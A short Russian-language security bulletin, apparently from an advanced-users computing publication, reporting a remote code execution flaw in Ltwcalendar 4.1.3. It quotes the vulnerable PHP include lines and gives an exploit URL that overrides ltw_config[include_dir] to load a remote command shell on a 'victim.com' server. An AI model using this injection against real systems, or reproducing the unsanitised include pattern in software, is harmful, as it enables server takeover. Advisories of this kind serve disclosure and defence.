Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Ltwcalendar.
Компьютер для продвинутых
пользователей
В этом выпуске:
Ltwcalendar
ПО: Ltwcalendar
Версия: 4.1.3
Уязвимость:
Уязвимость заключается в возможности выполнять произвольный код на
сервере.
Код: require_once('./private/ltw_config.php');
require_once($ltw_config['include_dir'].'/ltw_classes.php'); Использование: http://www.victim.com/Ltwcalendar/calendar.php?ltw_config[include_dir]=Command-Shell